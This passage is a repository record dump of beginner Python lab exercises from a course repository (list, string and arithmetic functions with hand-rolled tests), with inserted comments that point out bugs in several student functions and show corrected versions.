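    assert flat.tolist() == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
    assert np.array_equal(np.reshape(flat, z.shape), z)   # unstore_w round trip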
] | 3 |
slyflare/ECOR-1051-Lab
|
https://github.com/slyflare/ECOR-1051-Lab
|
920c580595015533ea8bd5169e4f5a0032c41aa3
|
f53f9c2d2243d342fc5e297bd036d46facf408fb
|
13399fa27450d58c8274e2138eb6372855c2fa75
|
refs/heads/main
| 2023-01-07T21:03:29.944920 | 2020-10-31T17:02:31 | 2020-10-31T17:02:31 | 308,930,752 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4387935996055603,
"alphanum_fraction": 0.5150798559188843,
"avg_line_length": 22.48611068725586,
"blob_id": "c8088ac2e954653eddfeb12cfb7e34b9f09ef3b4",
"content_id": "30cbc593cc7dbcd2232b281fbdec8086caf2ec81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1691,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 72,
"path": "/lab10.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1:\n\n\ndef bank_statement(L:list):\n \"\"\"Takes a list of floating point numbers and sorts them into positives and negatives. The positives act as the\n bank deposits whilst the negatives act as the withdrawals. The function then returns a new list contain total\n deposits, withdrawals, and balance.\n >>>bank_statement([2.3, 4.5, -4.12])\n [6.8, -4.12, 2.68]\n >>>bank_statement([8.12,-16.2,2.30])\n [10.42, -16.2, -5.78]\n \"\"\"\n deposits = 0\n withdrawal = 0\n for i in L:\n if i >= 0:\n deposits += i\n elif i < 0:\n withdrawal += i\n return [round(deposits,2), round(withdrawal,2), round(deposits+withdrawal,2)]\n\n\ntest = bank_statement([5.3, 6.975748, -2.234, -3.23409452312])\nprint(test)\n\nprint('----------------------------------------------------------------------------')\n\n# exercise 2:\n\n\ndef divisors(num: int):\n \"\"\"Takes a number and returns a list containing all of its divisors\n >>>divisors(5)\n [1,5]\n >>>divisors(6)\n [1,2,3,6]\n >>>divisors(8)\n [1,2,4,8]\n \"\"\"\n divs = []\n for i in range(1, num):\n if num % i == 0:\n divs.insert(i-1, i)\n divs.insert(len(divs), num)\n return divs\n\n\ntest = divisors(8)\nprint(test)\n\nprint('----------------------------------------------------------------------------')\n\n# exercise 3:\n\n\ndef reverse(L:list):\n \"\"\"Takes a list and reverses the order of the elements\n >>>reverse([1,2,3,4,5])\n [5,4,3,2,1]\n >>>reverse([12,15,14,13,11])\n [11,13,14,15,12]\n \"\"\"\n counter = 0\n N = []\n for i in L:\n N.insert(-1-counter, i)\n counter += 1\n return N\n\n\ntest = reverse([1,2,3,4,5,6,7,8,9,0])\nprint(test)\n"
},
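For comparison, divisors and reverse from lab10.py collapse to a comprehension and a slice; these are idiomatic alternatives that reproduce the docstring examples above, not the lab's required loop-based style:

    def divisors(num: int) -> list:
        # every i in 1..num that divides num with no remainder
        return [i for i in range(1, num + 1) if num % i == 0]

    def reverse(L: list) -> list:
        # a negative-step slice copies the list back to front
        return L[::-1]

    assert divisors(8) == [1, 2, 4, 8]
    assert reverse([1, 2, 3, 4, 5]) == [5, 4, 3, 2, 1]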
{
"alpha_fraction": 0.49822160601615906,
"alphanum_fraction": 0.5663474798202515,
"avg_line_length": 19.655366897583008,
"blob_id": "6ef3ad8374f2ce569075bd57b7240f9f90bb46d9",
"content_id": "7e87a616718cf80758e2fec137409036c04b677f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3655,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 177,
"path": "/lab6.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# excersise 1\ndef factorial(n: int) -> int:\n \"\"\"Return n! for\n >>> factorial(1)\n 1\n >>> factorial(2)\n 2\n >>> factorial(3)\n 6\n >>> factorial(4)\n 24\n positive values of n.\n \"\"\"\n fact: int = 1\n for i in range(2, n+1):\n fact = fact * n\n return fact\n\ndef test_int(actual:int,expected:int):\n print('Running automated testing...')\n print('Expected result:',expected, ', Actual result:',actual)\n if actual == expected:\n print('successful')\n test_int.counter += 1\n else:\n print('failed')\n print('total successful tests:', test_int.counter)\n\ntest_int.counter = 0\n\ntest = test_int(factorial(1),1)\ntest = test_int(factorial(2),2)\ntest = test_int(factorial(3),6)\ntest = test_int(factorial(4),24)\n\nprint('-----------------------------------------------------')\n# excersise 2\ndef tip(cost, satisfaction):\n \"\"\"Return estimated tips depending on customer satisfaction, 20% for full satisfaction, 15% for moderate satisfaction\n 5% for dissatisfied\n >>>tip(15,3)\n 3.0\n >>>tip(20,2)\n 3.0\n >>>tip(25,1)\n 1.25\n \"\"\"\n if satisfaction == 3:\n return cost*0.2\n if satisfaction == 2:\n return cost*0.15\n elif satisfaction == 1:\n return cost*0.05\n\n\nx = 0\ny = 0\n\ntest = tip(15,3)\nprint('testing tip(15,3)')\nprint('Expected result: 3.0, Actual result:', test)\n\nif test == 3.0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = tip(20,2)\n\nprint('testing tip(20,2)')\nprint('Expected result: 3.0, Actual result:', test)\nif test == 3.0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = tip (25,1)\nprint('testing tip(25.1)')\nprint('Expected result:1.5, Actual result:', test)\n\nif test == 1.25:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\nprint('Successful excersise 2 tests:', x)\nprint('Failed excersise 2 tests:', y)\n\nprint('-----------------------------------------------------')\n# excersise 3\ndef coupon(spent):\n \"\"\"Returns the value of the coupon based on the amount spent in groceries. If spent < 10 then there is no coupon,\n if 10 < spent <= 60 its 8%, if 60 < spent <= 150 its 10%, if 150 < spent <= 210 its 12%, if spent > 210 its 14%\n >>>coupon(5)\n 0\n >>>coupon(100)\n 10.0\n >>>coupon(150)\n 15.0\n >>>coupon(200)\n 24.0\n >>>coupon(250)\n 35.0\n \"\"\"\n if spent < 10:\n return 0\n if spent <= 60:\n return spent*0.08\n if 60 < spent <= 150:\n return spent*0.10\n if 150 < spent <= 210:\n return spent*0.12\n if spent > 210:\n return spent*0.14\n\n\nx = 0\ny = 0\n\ntest = coupon(5)\nprint('testing coupon(5)')\nprint('Expected result: 0, Actual result:', test)\nif test == 0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(100)\nprint('testing coupon(100)')\nprint('Expected result: 10.0, Actual result', test)\nif test == 10.0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(150)\nprint(\"testing coupon(150)\")\nprint('Expected result: 15.0, Actual result:', test)\nif test == 15.0:\n print('succesful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(200)\nprint(\"testing coupon(200)\")\nprint('Expected result: 24.0, Actual result:', test)\nif test == 24.0:\n print('succesful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(250)\nprint(\"testing coupon(250)\")\nprint('Expected result: 35.0, Actual result:', test)\nif test == 35.0:\n print('succesful')\n x += 1\nelse:\n print('failed')\n y += 1\n\nprint('Successful excersise 3 tests:', x)\nprint('Failed excersise 3 tests:', y)"
},
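Note that factorial in lab6.py multiplies by n on every pass (fact = fact * n), so factorial(3) returns 9 and factorial(4) returns 64 rather than the 6 and 24 its docstring promises; multiplying by the loop variable gives the intended result:

    def factorial(n: int) -> int:
        """Return n! for positive n, e.g. factorial(4) == 24."""
        fact = 1
        for i in range(2, n + 1):
            fact = fact * i    # multiply by i, not by n
        return fact

    assert factorial(3) == 6 and factorial(4) == 24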
{
"alpha_fraction": 0.41182321310043335,
"alphanum_fraction": 0.4996447265148163,
"avg_line_length": 20.195783615112305,
"blob_id": "71683d78a5ff2ac9c47de6c69b24602a0b130f96",
"content_id": "bfac091c46ad016945f789274664ae1bf909d2a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7037,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 332,
"path": "/lab8.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1:\n\n\ndef first_last6(nums:list):\n \"\"\"Returns true or false depending on whether the first and/or last number is 6\n >>>first_last6([1,2,3,4,5,6])\n True\n >>>first_last6([6,5,4,3,2,1])\n True\n >>>first_last6([5,6,6,6,6,5])\n False\n >>>first_last6([1,2,3,4,5,3,3,2,1])\n False\n \"\"\"\n a = len(nums)\n if nums[0] == 6 or nums[a-1] == 6:\n return True\n else:\n return False\n\n\ntest = first_last6([6, 1, 1, 1, 1])\nprint(test)\ntest = first_last6([11, 1, 1, 2, 3, 6])\nprint(test)\ntest = first_last6([1, 6, 6, 6, 6, 6, 1])\nprint(test)\n\n\nprint('-------------------------------------------------')\n# exercise 2:\n\n\ndef same_first_last(L:list):\n \"\"\"Returns True if the list is not empty and the first and last number are equal.\n >>>same_first_last([])\n False\n >>>same_first_last([1,2,3,4])\n False\n >>>same_first_last([1,2,3,1])\n True\n \"\"\"\n if L == []:\n return False\n if L[0] == L[len(L)-1]:\n return True\n else:\n return False\n\n\ntest = same_first_last([1, 2, 3, 1])\nprint(test)\ntest = same_first_last([])\nprint(test)\ntest = same_first_last([2, 3, 4, 1, 4])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 3:\n\n\ndef make_pi(pi:list):\n \"\"\" Returns true if a list of 3 has the elements containing 3,1,4\n >>>make_pi(3,1,4)\n True\n >>>make_pi(4,1,3)\n False\n \"\"\"\n if len(pi) == 3:\n if pi[0] == 3 and pi[1] == 1 and pi[2] == 4:\n return True\n else:\n return False\n else:\n return False\n return [3,1,4]\n\n\ntest = make_pi([3,1,4,6])\nprint(test)\ntest = make_pi([3,1,4])\nprint(test)\ntest = make_pi([1,2,3,4])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 4:\n\n\ndef common_end(list1:list,list2:list):\n \"\"\"Returns True if the lists contain the same last element and/or same first element\n >>>common_end([1,2,3],[3,2,1])\n True\n >>>common_end([2,3,4,5,6])\n False\n >>>common_end([1,2,3,4,5,6],[1,0,9,8,7])\n True\n \"\"\"\n if list1[len(list1)-1] == list2[len(list2)-1]:\n return True\n if list1[len(list1)-1] == list2[0]:\n return True\n if list1[0] == list2[len(list2)-1]:\n return True\n if list1[0] == list2[0]:\n return True\n else:\n return False\n\n\ntest = common_end([1,2,3,1,2,3],[2,2,2,2,2,3])\nprint(test)\ntest = common_end([1,2,3,4,5,6],[1,0,9,8,7])\nprint(test)\ntest = common_end([1,3,4,5,6,7,8],[8,7,6,5,4,3,2,1])\nprint(test)\ntest = common_end([3,2,1],[7,1,4])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 5:\n\n\ndef sum3(list:list):\n \"\"\"Returns the sum for the elements of a list containing 3 integers.\n >>>sum3([1,2,3])\n 6\n >>>sum3([12,13,15])\n 40\n >>>sum3([1,1,1])\n 3\n \"\"\"\n return list[0]+list[1]+list[2]\n\n\ntest = sum3([4,5,6])\nprint(test)\ntest = sum3([7,8,19])\nprint(test)\ntest = sum3([102,231,590])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 6:\n\n\ndef rotate_left3(rotate:list):\n \"\"\"Takes a 3 elements list and returns a new list with the same elements but shifted to the left.\n >>>rotate([1,2,3])\n [2,3,1]\n >>>rotate([24,32,1])\n [32,1,24]\n \"\"\"\n if len(rotate) == 3:\n x = rotate[0]\n y = rotate[1]\n z = rotate[2]\n rotate[0] = y\n rotate[1] = z\n rotate[2] = x\n return rotate\n else:\n return 'List requires only 3 elements'\n\n\ntest = rotate_left3([1, 2, 3])\nprint(test)\ntest = rotate_left3([1, 2, 3, 4])\nprint(test)\ntest = rotate_left3([21, 104, 54])\nprint(test)\n\nprint('-------------------------------------------------')\n# 
exercise 7:\n\n\ndef reverse3(reverse:list):\n \"\"\"Takes a 3 element list and swaps the first and last element.\n >>>reverse3([1,2,3])\n [3,2,1]\n >>>reverse3([12,61,45])\n [45,61,12]\n \"\"\"\n if len(reverse) == 3:\n x = reverse[0]\n y = reverse[2]\n reverse[0] = y\n reverse[2] = x\n return reverse\n else:\n return 'List requires 3 elements only'\n\n\ntest = reverse3([1, 2, 3])\nprint(test)\ntest = reverse3([3,6,2])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 8:\n\n\ndef max_end3(L:list):\n \"\"\"Compares the first and last element of the list and converts all the elements into the largest of the 2\n >>>max_end3([1,2,3])\n [3,3,3]\n >>>max_end3([12,1,9])\n [12,12,12]\n \"\"\"\n if len(L) ==3:\n if L[0] > L[2]:\n L[1] = L[0]\n L[2] = L[0]\n return L\n else:\n L[0] = L[2]\n L[1] = L[2]\n return L\n else:\n return 'List requires 3 elements only'\n\n\ntest = max_end3([1,2,3])\nprint(test)\ntest = max_end3([20,1,2])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 9:\n\n\ndef sum2(list1:list,list2:list):\n \"\"\"Takes the first 2 elements of 2 lists and adds them together if the 2 lists contain more then 1 element\n >>>sum2([1,2],[3,4])\n 4\n >>>sum2([1],[2,3])\n 0\n >>>sum2([5,12],[10,9])\n 15\n \"\"\"\n if len(list1) == 1:\n return 0\n if len(list2) == 1:\n return 0\n else:\n return list1[0] + list2[0]\n\n\ntest = sum2([1],[1,2])\nprint(test)\ntest = sum2([3,5],[6,2,4,8,2,12])\nprint(test)\ntest = sum2([315,32,15,61],[81,92,3,5])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 10:\n\n\ndef middle_way(list1:list,list2:list):\n \"\"\"Takes 2 lists and returns a new list containing the 2 middle elements\n >>>middle_way([5,4,6],[2,3,4])\n [4,3}\n >>>middle_way([6,21,31],[51,2,6])\n [21,2]\n \"\"\"\n if len(list1) >= 4:\n return 'List can not contain more then 3 elements'\n if len(list2) >= 4:\n return 'List can not contain more then 3 elements'\n return [list1[1],list2[1]]\n\n\ntest = middle_way([1,2,3],[3,2,1])\nprint(test)\ntest = middle_way([4,6,1],[4,9,0])\nprint(test)\ntest = middle_way([1,2,3,4],[1,2,3])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 11:\n\n\ndef make_ends(L:list):\n \"\"\"Returns a new list containing the first and last element of a list\n >>>make_ends([1,3,4,12,3])\n [1,3]\n >>>make_ends([31,64,68,345,29,889,12])\n [31,12]\n \"\"\"\n return [L[0],L[len(L)-1]]\n\n\ntest = make_ends([1,2,3])\nprint(test)\ntest = make_ends([2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,3])\nprint(test)\ntest = make_ends([12,413,61,69,350,65])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 12:\n\n\ndef has23(L:list):\n \"\"\"Returns true if a list contains 2 or 3 as one of their elements\n >>>has23([3,2,4,1])\n True\n >>>has23([2,4,5,6])\n True\n >>>has23([3,4,5,6])\n True\n >>>has23([6,7,8,9])\n False\n \"\"\"\n if 2 in L:\n return True\n if 3 in L:\n return True\n else:\n return False\n\n\ntest = has23([3,4,2,1])\nprint(test)\ntest = has23([1,1,1,1,2])\nprint(test)\ntest = has23([4,3,5,1,0])\nprint(test)\ntest = has23([1,4,5,6,7,8])\nprint(test)\n"
},
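Several lab8 helpers reduce to slicing: a left rotation is L[1:] + L[:1], and swapping the ends is a single tuple assignment. Equivalent short forms (the three-element length guard is omitted for brevity):

    def rotate_left3(L: list) -> list:
        # move the head element to the tail
        return L[1:] + L[:1]

    def reverse3(L: list) -> list:
        L[0], L[2] = L[2], L[0]    # swap first and last in place
        return L

    assert rotate_left3([1, 2, 3]) == [2, 3, 1]
    assert reverse3([12, 61, 45]) == [45, 61, 12]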
{
"alpha_fraction": 0.4637823700904846,
"alphanum_fraction": 0.5231071710586548,
"avg_line_length": 20.792856216430664,
"blob_id": "b9c6a7c4e9ec38b298b6ad5d963cc9964d2bc015",
"content_id": "886fbadf4b3b7e6ae67dfeb110d12356d65848fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3051,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 140,
"path": "/lab7.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1\n\ndef bakers_party(pastries:int, day:str):\n \"\"\"Returns if the bakers party is successful or not based on the day of the week and the number of pastries\n >>>bakers_party(39,'monday')\n False\n >>>bakers_party(63,'sunday')\n True\n >>>bakers_party(69,'tuesday')\n False\n >>>bakers_party(55,'friday')\n True\n \"\"\"\n weekday = ['monday', 'tuesday', 'wednesday', 'thursday']\n return (40 <= pastries <= 60) if day in weekday else (pastries <= 40)\n\n\ntest = bakers_party(40, 'monday')\nprint(test)\ntest = bakers_party(16, 'friday')\nprint(test)\ntest = bakers_party(64,'saturday')\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 2\n\ndef squirrel_play(temp:float, summer:bool):\n \"\"\" Returns if the squirrels go out and play depending on the temperature and if it is summer or not.\n >>>squirrel_play(75,False)\n True\n >>>squirrel_play(35,True)\n False\n \"\"\"\n return (60.0 <= temp <= 100) if summer else (60.0 <= temp <= 90)\n\n\ntest = squirrel_play(70, True)\nprint(test)\ntest = squirrel_play(34, False)\nprint(test)\ntest = squirrel_play(101, True)\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 3\n\ndef great_42(num1:int, num2:int):\n \"\"\"Returns true or false depending on if the 2 parameters are 42, have a sum of 42, or difference of 42.\n >>>great_42(42,1)\n True\n >>>great_42(32,10)\n True\n >>>great_42(43,1)\n True\n >>>great_42(1,2)\n False\n \"\"\"\n if num1 or num2 == 42:\n return True\n else:\n if num1+num2 == 42:\n return True\n if abs(num2-num1) == 42:\n return True\n else:\n return False\n\n\ntest = great_42(42, 1)\nprint(test)\ntest = great_42(32, 10)\nprint(test)\ntest = great_42(43, 1)\nprint(test)\ntest = great_42(0, 4)\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 4\ndef blackjack(a:int, b:int):\n \"\"\"Returns the variable closet to 21. However variables above 21 will return a 0.\n >>>blackjack(2,19)\n 19\n >>>blackjack(26,2)\n 2\n >>>blackjack(24,23)\n 0\n \"\"\"\n if b > 21:\n b = 0\n if a > 21:\n a = 0\n if a or b <= 21:\n if b <= a <= 21:\n return a\n elif a <= b <= 21:\n return b\n\ntest = blackjack(2, 55)\nprint(test)\ntest = blackjack(21, 22)\nprint(test)\ntest = blackjack(24, 23)\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 5\ndef sum_uniques(a, b, c):\n \"\"\"Returns the sum of 3 unique numbers. If the number is the same it will not towards the summation.\n >>>sum_uniques(1, 2 ,3)\n 6\n >>>sum_uniques(5, 5, 4)\n 9\n >>>sum_uniques(2, 2, 2)\n 0\n \"\"\"\n if a == c == b:\n a = 0\n b = 0\n c = 0\n elif a == c:\n a = 0\n elif a == b:\n b = 0\n elif b == c:\n c = 0\n return a+b+c\n\n\ntest = sum_uniques(1, 10, 2)\nprint(test)\ntest = sum_uniques(3, 3, 3)\nprint(test)\ntest = sum_uniques(5, 5, 4)\nprint(test)\n"
},
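Beware the condition `if num1 or num2 == 42` in great_42 above: Python parses it as `num1 or (num2 == 42)`, which is truthy whenever num1 is nonzero, so great_42(1, 2) wrongly returns True even though the docstring expects False (blackjack's `if a or b <= 21` has the same flaw). Naming the value in each comparison fixes it:

    def great_42(num1: int, num2: int) -> bool:
        # "a or b == 42" is NOT "a == 42 or b == 42"; test each value explicitly
        return (num1 == 42 or num2 == 42
                or num1 + num2 == 42
                or abs(num1 - num2) == 42)

    assert great_42(42, 1) and great_42(32, 10) and great_42(43, 1)
    assert not great_42(1, 2)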
{
"alpha_fraction": 0.4631892740726471,
"alphanum_fraction": 0.5600596070289612,
"avg_line_length": 22.97142791748047,
"blob_id": "0e16fbc63cb619e191c8c486d00bdc132ef9902b",
"content_id": "d1ba1bc0579cf9ccec680cb7f902b9fc2b4c7bd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3355,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 140,
"path": "/lab9.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1:\n\n\ndef count_evens(list:list):\n \"\"\"Counts the number of elements that are even\n >>>count_evens([1,3,5,7])\n 0\n >>>count_evens([2,4,6,8])\n 4\n >>>count_evens([9,4,0,8])\n 3\n \"\"\"\n count = 0\n for x in list:\n if x % 2 == 0:\n count += 1\n return count\n\n\ndef test_count_evens(expected:int, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', count_evens(l))\n if expected == count_evens(l):\n return 'Successful'\n else:\n return 'Failed'\n\n\ntest = test_count_evens(2,[1,2,3,4])\nprint(test)\ntest = test_count_evens(4,[2,4,6,8])\nprint(test)\ntest = test_count_evens(0,[1,3,5,7,9,11,13,15])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 2:\n\n\ndef big_diff(L:list):\n \"\"\"Finds the difference between the largest element and the smallest element of the list.\n >>>big_diff([1,2,3])\n 2\n >>>big_diff([10,11,12,16])\n 6\n \"\"\"\n x = 0\n y = 1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n for i in L:\n if x < i:\n x = i\n elif y > i:\n y = i\n return x - y\n\ndef test_big_diff(expected:int, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', big_diff(l))\n if expected == big_diff(l):\n return 'Successful'\n else:\n return 'Failed'\n\n\ntest = test_big_diff(9,[11,2,3])\nprint(test)\ntest = test_big_diff(2,[3,2,1])\nprint(test)\ntest = test_big_diff(5,[10,5,6,8])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 3:\n\n\ndef has22(list:list):\n \"\"\"If function has 2 2s side by side, returns true else false\n >>>has22([1,2,2,1])\n True\n >>>has22([1,2,3,42,3,4])\n False\n >>>has22([2,1,3,2,4,2,2])\n True\n \"\"\"\n for i in range(len(list)-1):\n if list[i] == 2:\n if list[i+1] == 2:\n return True\n return False\n\ndef test_has22(expected, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', has22(l))\n if expected == has22(l):\n return 'Successful'\n else:\n return 'Failed'\n\ntest = test_has22(False,[1,1,1,1,1,1,1,2])\nprint(test)\ntest = test_has22(False,[1,3,4,5,5,6,7,7,8])\nprint(test)\ntest = test_has22(True,[1,2,2,3,4,5])\nprint(test)\ntest = test_has22(True,[1,2,1,1,2,1,2,2])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 4:\n\n\ndef centered_average(L:list):\n \"\"\"Finds the average of the list consisting of all elements except the max and min.\n >>>centered_average([1,2,3,4])\n 2.5\n >>>centered_average([10,11,12,13])\n 11.5\n >>>centered_average([23,21,1,14,5])\n 13.3333333333333333333\n \"\"\"\n x = 0\n for i in L:\n x += i\n return (x - min(L) - max(L))/(len(L)-2)\n\ndef test_centered_average(expected:float, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', centered_average(l))\n if expected == centered_average(l):\n return 'Successful'\n else:\n return 'Failed'\n\n\ntest = test_centered_average(2.5,[1,2,3,4])\nprint(test)\ntest = test_centered_average(15.0,[10,12,14,16,18,20])\nprint(test)\ntest = test_centered_average(8.2,[21,3,4,5,1,61,8])\nprint(test)"
},
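big_diff above seeds its running maximum with 0 and its minimum with a 96-digit sentinel, so an all-negative list such as [-1, -3] yields 0 - (-3) = 3 instead of 2; the built-ins make the intent direct and cover every case:

    def big_diff(L: list) -> int:
        # largest element minus smallest element
        return max(L) - min(L)

    assert big_diff([10, 11, 12, 16]) == 6
    assert big_diff([-1, -3]) == 2    # the sentinel version returns 3 here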
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.7261538505554199,
"avg_line_length": 24.076923370361328,
"blob_id": "73c1c2089da76827d6bc8db359cb84217c0c48c7",
"content_id": "6f297275833e6ca5480e03958ebf102af9200b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 13,
"path": "/lab3ex4.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "import math\n\ndef area_of_cone(height, radius):\n return math.pi*(radius)*math.sqrt(radius**2+height**2)\n\nsurface_area = area_of_cone(5,10)\nprint(surface_area)\nsurface_area = area_of_cone(5.0,10.0)\nprint(surface_area)\nsurface_area = area_of_cone(0,10)\nprint(surface_area)\nsurface_area = area_of_cone(5,0)\nprint(surface_area)"
},
{
"alpha_fraction": 0.5426945090293884,
"alphanum_fraction": 0.5597723126411438,
"avg_line_length": 17.821428298950195,
"blob_id": "895e7122161e5eca1accb38e8b4f7d3871cf7d79",
"content_id": "c0ce1ab4fffc40ed9362eff7d850e54123efcc28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1054,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 56,
"path": "/lab5.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# excerise 4\n\ndef repeat(s: str, n: int) -> str:\n \"\"\" Return s repeated n times; if n is negative, return the\n empty string.\n >>> repeat('yes', 4)\n 'yesyesyesyes'\n >>> repeat('no', 0)\n ''\n >>> repeat('no', -2)\n ''\n >>> repeat('yesnomaybe', 3)\n 'yesnomaybeyesnomaybeyesnomaybe'\n \"\"\"\n return s * n\n\n\nresult = repeat(\"yes\", 4)\nprint(result)\n\n\n# excersie 5\n\ndef total(s1: str, s2: str):\n \"\"\" Return the sum of the lengths of s1 and s2.\n >>> total('yes', 'no')\n 5\n >>> total('yes', '')\n 3\n >>> total('YES!!!!', 'Noooooo')\n 14\n \"\"\"\n return len(s1 + s2)\n\n\nresult = total('YES!!!!', 'Noooooo')\nprint(result)\n\n\n# excersise 6\n\ndef replicate(s: str):\n \"\"\"Returns a new string containing the original string copied by a number of times determined by the number of\n characters in the original string\n >>> replicate('no')\n 'nono'\n >>> replicate('loom')\n 'loomloomloomloom'\n >>> replicate('ma')\n 'mama'\n \"\"\"\n return len(s) * s\n\n\nresult = replicate('yes')\nprint(result)\n"
},
{
"alpha_fraction": 0.6366559267044067,
"alphanum_fraction": 0.6752411723136902,
"avg_line_length": 18.5,
"blob_id": "dc0312043e1d6b80eab746f76e1557005ec0efb5",
"content_id": "65cc2bc6aebc915188817957391d94288f769c37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 16,
"path": "/lab3ex1.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "import math\n\ndef area_of_disk(radius):\n return math.pi * radius ** 2\n\ndef area_of_ring(outer,inner):\n return area_of_disk(outer) - area_of_disk(inner)\n\narea = area_of_disk(5)\nprint(area)\narea = area_of_disk(5.0)\nprint(area)\narea = area_of_ring(10, 5)\nprint(area)\narea = area_of_ring(10.0, 5.0)\nprint(area)"
},
{
"alpha_fraction": 0.6223776340484619,
"alphanum_fraction": 0.7226107120513916,
"avg_line_length": 27.53333282470703,
"blob_id": "36433d1fe8e344e0ed5774c8f2734f0ae7e43431",
"content_id": "371eaa5a9cf8df63571e967c84297f7400a439e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 15,
"path": "/lab3ex3.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "\n\ndef accumulated_amount(principal, rate, n, time):\n return principal*(1+(rate/n))**(n*time)\n\namount = accumulated_amount(10,2,1,2)\nprint(amount)\namount = accumulated_amount(10.0,2.0,1.0,2.0)\nprint(amount)\namount = accumulated_amount(1500,0.3,2,2)\nprint(amount)\namount = accumulated_amount(1500.0,0.3,2.0,2.0)\nprint(amount)\namount = accumulated_amount(0,2,1,2)\nprint(amount)\namount = accumulated_amount(10,0,1,2)\nprint(amount)"
},
{
"alpha_fraction": 0.4937998354434967,
"alphanum_fraction": 0.5513728857040405,
"avg_line_length": 28.54054069519043,
"blob_id": "cdc1945984c1fa79501920e7fdefbd8974965ccf",
"content_id": "067495b07e68223b39be4c0db152daaadc4d6441",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2258,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 74,
"path": "/lab12-linearRegression.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
